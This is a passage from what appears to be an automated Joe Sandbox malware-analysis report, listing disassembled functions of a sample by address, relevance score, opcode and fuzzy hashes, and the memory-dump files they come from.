                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 2005118841-0
                                                                                                        • Opcode ID: 766a0aefde026521459d75869acb7484ff9e7024142c9daddcb395b373c150c8
                                                                                                        • Instruction ID: b81cd82d9ff43d877f7d26e5e20f13dfacf69febdbf28281fa25f8175d85effe
                                                                                                        • Opcode Fuzzy Hash: 766a0aefde026521459d75869acb7484ff9e7024142c9daddcb395b373c150c8
                                                                                                        • Instruction Fuzzy Hash: D152ED719002899FDF24DFA8C8A4BEE7BF9AF04354F944159FC1597282EB70DA48CB91
                                                                                                        Function 00AD533B Relevance: .7, Instructions: 747COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d8bb18c641ab11d63167c57e56a608c39498e0d2e398586483e4df6fa2ebb9a2
                                                                                                        • Instruction ID: 55608e052a306dfc5fb6dbda737de720cce1b1fdefcbe932a3987a0eda15e6d9
                                                                                                        • Opcode Fuzzy Hash: d8bb18c641ab11d63167c57e56a608c39498e0d2e398586483e4df6fa2ebb9a2
                                                                                                        • Instruction Fuzzy Hash: 76720774E142588FDB08CFA8E5A1AEDBBF1EB4D310F14405AE552FB391CA34A942CF64
                                                                                                        Function 00B2E90D Relevance: .7, Instructions: 656COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 75e21fa1371589e7861ae8ec329197f74d44603ab47acdac22aa5e0a3f0fc385
                                                                                                        • Instruction ID: 969f192be5e4632ccfbf96a79a6d48bb900a4b5908c6ff0c09b1fa7eb63587cc
                                                                                                        • Opcode Fuzzy Hash: 75e21fa1371589e7861ae8ec329197f74d44603ab47acdac22aa5e0a3f0fc385
                                                                                                        • Instruction Fuzzy Hash: 7532AC74A0021A9FCF18CF99D9D1ABEB7B5FF45304F2441A8D859AB305D732EA46CB90
                                                                                                        Function 00B39879 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 22902c693b4bb3840ae99081fd54a6a5253ad84b9bfc7d3682612740af5088ec
                                                                                                        • Instruction ID: de1188faa6e23deca65c0e6c194fac300465ff9ac598f49c94f5c2bd3ae606e7
                                                                                                        • Opcode Fuzzy Hash: 22902c693b4bb3840ae99081fd54a6a5253ad84b9bfc7d3682612740af5088ec
                                                                                                        • Instruction Fuzzy Hash: CA321522D69F014DD7279634DC62336A688AFB73C4F25D727E81AB6AA5EF6DC4C34100
                                                                                                        Function 00ABA2C0 Relevance: .6, Instructions: 616COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9d5e7a2a04df1d45335b3c56926358356371f866689e65c2cd21e6ef62be55b
                                                                                                        • Instruction ID: b191f294c57fb1ab65172ed01e40433e0240ebcd52edf993f4edaf34c01997f9
                                                                                                        • Opcode Fuzzy Hash: f9d5e7a2a04df1d45335b3c56926358356371f866689e65c2cd21e6ef62be55b
                                                                                                        • Instruction Fuzzy Hash: DE329C71A002589FCB14DF68CA84BEEBBF9BF58304F494159E8469B342DB30ED45CB92
                                                                                                        Function 00ADC7C5 Relevance: .5, Instructions: 541COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b345ba8b38341cccfc889772dd70da734f7938a3a234f836b857a04adff9addb
                                                                                                        • Instruction ID: 0dfe39a6e15fee9cbabb919a836c52113100ba1c33258b1f6f65581fee3a1ecc
                                                                                                        • Opcode Fuzzy Hash: b345ba8b38341cccfc889772dd70da734f7938a3a234f836b857a04adff9addb
                                                                                                        • Instruction Fuzzy Hash: 6652AF76D106199FDB14CFA8C981AAEB7F1FF4C314F5681A9D919AB302C634BA41CF90
                                                                                                        Function 00AC12A0 Relevance: .5, Instructions: 529COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                                                                                        • Instruction ID: 6bf68527db4d92c953d1dbb3a6e8a6d636313c7f27d7ad77dc6105d470db131a
                                                                                                        • Opcode Fuzzy Hash: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                                                                                        • Instruction Fuzzy Hash: 6E12FA717042118FDB48CF1DDCA574AB7E2EFC4318F0E8178A8498BB62D639DC958B86
                                                                                                        Function 00AC23C0 Relevance: .5, Instructions: 525COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                                                                                        • Instruction ID: d417ab0b73d6ef2c1b0c551f4cbd6317121ea9b5ab46a7bcefbc90127a067a95
                                                                                                        • Opcode Fuzzy Hash: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                                                                                        • Instruction Fuzzy Hash: 7F1249727083158BC708CE5DDC91759B7E2BBC8314F09453DA84ADB791EBB8ED498B82
                                                                                                        Function 00AB8E90 Relevance: .5, Instructions: 504COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fd4127f57355a9937053d8353041e1445a8f1c638972374f3567303a9d6fee04
                                                                                                        • Instruction ID: 2eba5f3d6769fcea509c18a8b7a1fa5b93efa6fe3c26e05fcda70e962aedf7f8
                                                                                                        • Opcode Fuzzy Hash: fd4127f57355a9937053d8353041e1445a8f1c638972374f3567303a9d6fee04
                                                                                                        • Instruction Fuzzy Hash: 55123A75E002199FCF14CF98D994AEEBBB9FF88310F154129E906AB356DB30AD05CB90
                                                                                                        Function 00AD5C84 Relevance: .4, Instructions: 401COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bfe15c81372a7d4229630d6a6a7622496b4ade7536356b2c519e8fe3a8626b2b
                                                                                                        • Instruction ID: 1272c3fd9035a5c91c49628db873fedbf16ec81d621270c9f6f12cfd320ec8a4
                                                                                                        • Opcode Fuzzy Hash: bfe15c81372a7d4229630d6a6a7622496b4ade7536356b2c519e8fe3a8626b2b
                                                                                                        • Instruction Fuzzy Hash: 1B029F3280A2B49FDB92EF5ED8405AB73F4FF90355F438A2ADD8163241D331EA099794
                                                                                                        Function 00AD6746 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42ade4f2f82af98c3cceaca5a74e2161672751601ebca0b43091e2ea68146a4d
                                                                                                        • Instruction ID: 1bdb37140251795dd9fb11509e601379851c80529e05b661458096b85a4e5a66
                                                                                                        • Opcode Fuzzy Hash: 42ade4f2f82af98c3cceaca5a74e2161672751601ebca0b43091e2ea68146a4d
                                                                                                        • Instruction Fuzzy Hash: C2E12974A240549BC718CF48E5E0ABEB7F1FB48301B2645CDD4966B392CA35AF51EF60
                                                                                                        Function 00B19B35 Relevance: .3, Instructions: 254COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction ID: 0ee0612eb6275d8d784099d8f87d17acb6353ec1333ae707f3190acf8d645dc0
                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                        • Instruction Fuzzy Hash: 2691867220C0E34ADB2D463A95740BEFFE1DA527A175A07EDD4F2CB1C5EE10D594E620
                                                                                                        Function 00A712E0 Relevance: .2, Instructions: 249COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __onexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 1448380652-0
                                                                                                        • Opcode ID: 8dd113776e8f49f11b1a6a2d1391a7e1580f975d0b66c9dce90963eebcd6118e
                                                                                                        • Instruction ID: 748d306fe641d57ba64371c2c98e4f645b4de76c837ae706e92ff23ef1cc37cc
                                                                                                        • Opcode Fuzzy Hash: 8dd113776e8f49f11b1a6a2d1391a7e1580f975d0b66c9dce90963eebcd6118e
                                                                                                        • Instruction Fuzzy Hash: 19B12071655386EAE700AF70ED1AB3A3AE0EB02708F6454B9E6405F2F2DFF95904CB45
                                                                                                        Function 00B19DF0 Relevance: .2, Instructions: 244COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction ID: 4046c6a755e95a927029897a7d5b4ed112390bc33d029163bb7e4f268cba0f7d
                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                        • Instruction Fuzzy Hash: C49197732090E34EDB29823A85780BDFFE19A523A175A07DDD4F2CB1C5EE14D5E9D620
                                                                                                        Function 00B1986E Relevance: .2, Instructions: 240COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction ID: def1b27232df77edf659d97571dae73de476eaf67a43679cdb1066f31259ce67
                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                        • Instruction Fuzzy Hash: F79143722090E34ADB6D467A85740BEFFE19A923E135A07EED4F2CA1C5FD24C598D620
                                                                                                        Function 00B195C4 Relevance: .2, Instructions: 232COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction ID: 299e92d5887131874404654dddd2f592bac1bfd6972637fcb927f633ccbb62f7
                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                        • Instruction Fuzzy Hash: C48175722090E34ADB2D463A85740BEFFE19E523A175A07DED4F2CB1C5FE14DA94E620
                                                                                                        Function 00AD5EA8 Relevance: .2, Instructions: 225COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35bd22f95dab943cb3221f365cd1ea733415a38271d1e5144e58f245e77465ab
                                                                                                        • Instruction ID: a7698a298c9e2e7bf289ee011ffd05927077ce90ef2335a1120d1c0a1c98179b
                                                                                                        • Opcode Fuzzy Hash: 35bd22f95dab943cb3221f365cd1ea733415a38271d1e5144e58f245e77465ab
                                                                                                        • Instruction Fuzzy Hash: B6A133324192B49FDB52EF6ED8400AB73B5EF94355F43892FDCC267281C235EA089795
                                                                                                        Function 00ADCF3F Relevance: .2, Instructions: 221COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
